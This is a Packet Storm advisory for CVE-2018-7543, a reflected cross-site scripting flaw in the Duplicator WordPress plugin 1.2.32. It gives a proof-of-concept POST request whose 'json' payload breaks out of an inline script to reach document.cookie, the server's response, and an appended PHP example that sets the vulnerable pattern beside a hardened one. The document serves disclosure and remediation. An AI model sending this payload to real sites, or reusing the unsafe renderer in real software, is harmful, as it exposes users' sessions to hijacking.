WordPress Duplicator 1.2.32 Cross Site Scripting

Author: Stefan Broeder
Source: packetstormsecurity.com (PACKETSTORM:146816)
Published: Mar 15, 2018

EPSS: 0.002
Percentile: 60.7%

# Exploit Title : Duplicator WordPress Migration Plugin Reflected Cross Site Scripting (XSS)
# Date: 25-02-2018   
# Exploit Author : Stefan Broeder  
# Contact : https://twitter.com/stefanbroeder  
# Vendor Homepage: https://snapcreek.com/  
# Software Link: https://wordpress.org/plugins/duplicator/  
# Version: 1.2.32  
# CVE : CVE-2018-7543  
# Category : webapps  
  
Description  
===========  
Duplicator is a WordPress plugin with more than 1 million active installations. Version 1.2.32 (and possibly previous versions) is affected by a reflected XSS vulnerability.
  
Vulnerable part of code  
=======================  
File: duplicator/installer/build/view.step4.php, line 254, writes the $_POST variable 'json' directly into an inline <script> block without any encoding, so its contents are parsed as JavaScript.
  
Impact  
======  
Arbitrary JavaScript can be executed in the victim's browser if the user is tricked into clicking a link or browsing to a URL under the attacker's control.
  
Proof of Concept
================
In order to exploit this vulnerability, an attacker has to send the following request to the server:  
  
POST /wp-content/plugins/duplicator/installer/build/view.step4.php HTTP/1.1  
Host: <hostname>  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: wordpress_5c016e8f0f95f039102cbe8366c5c7f3=wp%7C1518599198<omissis>  
Connection: close  
Upgrade-Insecure-Requests: 1  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 91  
  
json='a';};document.write(alert(document.cookie));MyViewModel%3dfunction(){this.status%3d''  
  
The server replies as reported below:  
  
HTTP/1.1 200 OK  
Date: Mon, 12 Feb 2018 14:15:28 GMT  
Server: Apache/2.4.29 (Debian)  
Vary: Accept-Encoding  
Content-Length: 10224  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
...  
  
<script>  
MyViewModel = function() {  
this.status = 'a';};document.write(alert(document.cookie));MyViewModel=function(){this.status='';  
var errorCount = this.status.step2.query_errs || 0;  
(errorCount >= 1 )  
? $('#dup-step3-install-report-count').css('color', '#BE2323')  
: $('#dup-step3-install-report-count').css('color', '#197713')  
};  
ko.applyBindings(new MyViewModel());   
</script>  
  
Solution  
========  
  
Update to version 1.2.33  
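The pattern described under "Vulnerable part of code", reconstructed beside a hardened form, as an added example (not Duplicator's own code, and not the fix that shipped in 1.2.33): the function names, the template text and the sample inputs are assumptions.

```php
<?php
// Added example (not Duplicator's code): a minimal reconstruction of the
// view.step4.php pattern the advisory describes, beside a hardened version.
// Function names, template text and sample inputs are assumptions.

// Vulnerable pattern: the raw POST value is concatenated into a <script>
// block, so whatever the browser parses as JavaScript is executed.
function render_step4_unsafe(string $json): string
{
    return "<script>\nMyViewModel = function() {\n"
         . "this.status = " . $json . ";\n"
         . "};\nko.applyBindings(new MyViewModel());\n</script>\n";
}

// Hardened pattern: treat the parameter as data. Parse it as JSON, reject
// anything that does not decode to an array/object, and re-serialize with
// json_encode using the JSON_HEX_* flags so <, >, &, ' and " are emitted as
// \uXXXX escapes and cannot close the string or the script context.
function render_step4_safe(string $json): string
{
    $status = json_decode($json, true);
    if (!is_array($status)) {
        // Not a JSON object/array: refuse instead of echoing the raw input.
        throw new InvalidArgumentException('status must be a JSON object');
    }
    $encoded = json_encode(
        $status,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
    return "<script>\nMyViewModel = function() {\n"
         . "this.status = " . $encoded . ";\n"
         . "};\nko.applyBindings(new MyViewModel());\n</script>\n";
}

// Constructed inputs: the advisory's breakout payload, and a benign status
// object shaped like the one the template's own code reads (step2.query_errs)
// that also carries a closing tag inside a string value.
$payload = "'a';};document.write(alert(document.cookie));MyViewModel=function(){this.status=''";
$benign  = '{"step2":{"query_errs":0},"note":"</script><script>alert(1)</script>"}';

echo render_step4_unsafe($payload);   // payload lands unchanged inside the script
try {
    render_step4_safe($payload);      // not valid JSON: rejected
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
echo render_step4_safe($benign);      // '<' and '>' come out as \u003c and \u003e
```

Running it with the php CLI prints the unescaped breakout for the unsafe renderer, a rejection for the hardened one, and an escaped object literal for the benign input.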
  
